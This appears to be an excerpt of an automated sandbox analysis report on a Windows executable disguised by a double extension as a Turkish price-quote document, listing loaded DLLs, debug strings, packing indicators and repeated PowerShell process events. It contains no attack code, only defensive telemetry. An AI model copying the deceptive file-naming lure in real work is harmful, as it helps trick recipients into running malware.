                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbn source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1630488283.0000000001736000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1630907951.00000000017E5000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Xml.ni.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1630488283.0000000001736000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbP source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1630488283.0000000001736000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdb4 source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Configuration.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.pdbMZ source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Xml.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Configuration.pdbTz source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Core.ni.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Windows.Forms.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: mscorlib.pdb source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1630488283.0000000001736000.00000004.00000020.00020000.00000000.sdmp, WERA608.tmp.dmp.12.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1630488283.0000000001736000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Core.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Core.pdb" source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.ni.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERA608.tmp.dmp.12.dr

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeUnpacked PE file: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.ce0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeUnpacked PE file: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.ce0000.0.unpack
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_03148B89 push ecx; retf 0_2_03148B8A
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F72BCE push eax; iretd 0_2_09F72BCF
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F753B4 push ebx; iretd 0_2_09F753C7
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F8EE08 pushad ; iretd 0_2_09F8EE09
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: section name: .text entropy: 7.568644152152716
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 615tbi507_ accado san tic_ sipari#u015fi jpeg docx .exe
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 615tbi507_ accado san tic_ sipari#u015fi jpeg docx .exe
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 615tbi507_ accado san tic_ sipari#u015fi jpeg docx .exe
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 615tbi507_ accado san tic_ sipari#u015fi jpeg docx .exe
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 615tbi507_ accado san tic_ sipari#u015fi jpeg docx .exeJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 615tbi507_ accado san tic_ sipari#u015fi jpeg docx .exeJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 615tbi507_ accado san tic_ sipari#u015fi jpeg docx .exeJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
